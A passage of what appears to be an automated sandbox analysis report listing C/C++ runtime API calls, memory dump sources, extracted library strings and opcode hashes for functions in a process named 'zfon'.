                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B55D10
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55D4F
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55D69
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B55E3A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: ,$false$true
                                                                                                                                                                            • API String ID: 4163931919-760133229
                                                                                                                                                                            • Opcode ID: c0f2ef7070c1f49761d02a5703fcc8a9b7b3e5ed5308bd7948f2b64a82fafe73
                                                                                                                                                                            • Instruction ID: 81dfb3d79b10e1d5771aef220f03cd13f2c856cb2a645ee99742195b41f84870
                                                                                                                                                                            • Opcode Fuzzy Hash: c0f2ef7070c1f49761d02a5703fcc8a9b7b3e5ed5308bd7948f2b64a82fafe73
                                                                                                                                                                            • Instruction Fuzzy Hash: A3515F66618B8182D721CF21F5402ABB374FB89794F406226EB9E177A9DF3CD195CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                            • API String ID: 2943138195-2239912363
                                                                                                                                                                            • Opcode ID: 39f267e24cea2a085efea57700c8f0511391629eccd065b63ffe6c0b5b6c4cba
                                                                                                                                                                            • Instruction ID: 803e0f83991fafb479f53aaf274c44cb5cd7c1beeab33847d83dc035c6fde0a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 39f267e24cea2a085efea57700c8f0511391629eccd065b63ffe6c0b5b6c4cba
                                                                                                                                                                            • Instruction Fuzzy Hash: 18513AAAE18B9298FB118F70D8803BE77B0BB08754F656135DE4D32A95DF3CA058CB14
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initstd::ios_base::_$AddstdExceptionThrowsetvbufstd::ios_base::failure::failurestd::locale::_
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 692481045-1866435925
                                                                                                                                                                            • Opcode ID: fd2f3828b474fe88a08b624c1155f3347718e21b58a1bf8b771f14d77974cb8c
                                                                                                                                                                            • Instruction ID: 60fbd9d6313f2508841ebe9c80fa53b543ea23b08d4c10ac0df8aa416b525f34
                                                                                                                                                                            • Opcode Fuzzy Hash: fd2f3828b474fe88a08b624c1155f3347718e21b58a1bf8b771f14d77974cb8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 19418DB6614B4686EB54CF35D5913AA33A0FB04B88F44A035DB4C6B759EF3CD5A0CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 1099746521-1866435925
                                                                                                                                                                            • Opcode ID: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                                                                                            • Instruction ID: 4f3af5181884865ff261947a1e0553dc6904c5ebe201bbad0309ba6c8fe3f169
                                                                                                                                                                            • Opcode Fuzzy Hash: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6521F1E9A1950B92FF148F20D8111FB1360AF54748FD83035E52E665A5EE2CE626CF50
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcmp.VCRUNTIME140 ref: 00007FF79CFB9F9A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FC9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FD9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FE9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FF6
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA099
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA0A9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA0B9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA0C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 807481086-0
                                                                                                                                                                            • Opcode ID: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                                                                                            • Instruction ID: 525dcc4972f423c015b419358e0f121497e6c2d751ba4c4f6d95a348e9f3c878
                                                                                                                                                                            • Opcode Fuzzy Hash: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                                                                                            • Instruction Fuzzy Hash: C4617D33A0CA4755FE34AB25E4483B9A6B2EB85BA0FC40535DA9D037D5DF7CE5858320
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24CB
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: memcpy.VCRUNTIME140(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24E2
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24FA
                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBB6F
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBB8C
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBBAF
                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBBE9
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBBFF
                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBC2C
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBC46
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBC60
                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF79CFBBC7E
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF79CFBBC93
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$freememmove$malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4013446061-0
                                                                                                                                                                            • Opcode ID: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                                                                                            • Instruction ID: 0d2b195c391df67fbc81a8cba0b79c1b845212a9a731ac44ed48863c94c10074
                                                                                                                                                                            • Opcode Fuzzy Hash: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                                                                                            • Instruction Fuzzy Hash: 92519666709B8641DE21EB26E94436AE7A1FB45BD4F944235EE9E07B99EF3CD0408310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                                                                                            • Instruction ID: b984b9f16a7d4668a9c660f5b70405841621e6bb32d1f368aea0f62e97138423
                                                                                                                                                                            • Opcode Fuzzy Hash: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A71C4BA608E0682EF14CF24C45037AA760FB84F85F446135DA0E637A4DF3DD855CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                                                                                            • Instruction ID: 4692843a78d2aca73b0a01c75547097f290411f2e1ef989e6c7c14c771e2c6c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                                                                                            • Instruction Fuzzy Hash: 897190BAA08E0681EB14CF25D49037A67A0FB84F85F456136DA1E637A4DF3CE841CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                                                                            • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                                            • API String ID: 1852475696-928371585
                                                                                                                                                                            • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                                                                                            • Instruction ID: 8e2567c36a2bae1a356843c50b78a3089a4610a57e919301aee61fdac8d899b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                                                                                            • Instruction Fuzzy Hash: AC5180AAB19A4792DB24CF34E4913BB6360FF44B84F51A431DE4D53669EEBCE506CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                                                                                            • Instruction ID: 2f3254ce09e9dae583c2b9dc5ac54ec82b8d132a21c8a97b5786dc2c99316318
                                                                                                                                                                            • Opcode Fuzzy Hash: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                                                                                            • Instruction Fuzzy Hash: 255185B6A0890582EF24DF28D49137A6760FB45F98F54A135DA1EA37B5DF3CE492CB00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B558CB
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B55903
                                                                                                                                                                            • _Getvals.LIBCPMT ref: 00007FFBC1B5593C
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B55A16
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                            • API String ID: 801482897-3573081731
                                                                                                                                                                            • Opcode ID: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                                                                                            • Instruction ID: 7a31320c74e367318f5d219f39f56280f2e5cf3d4a0faa1a2adfa282bab0be9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                                                                                            • Instruction Fuzzy Hash: E551DEBAA08B8186E724CF30D59056E7BB0FB46BA1B142235CB9A53794DB3CE485CB00
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
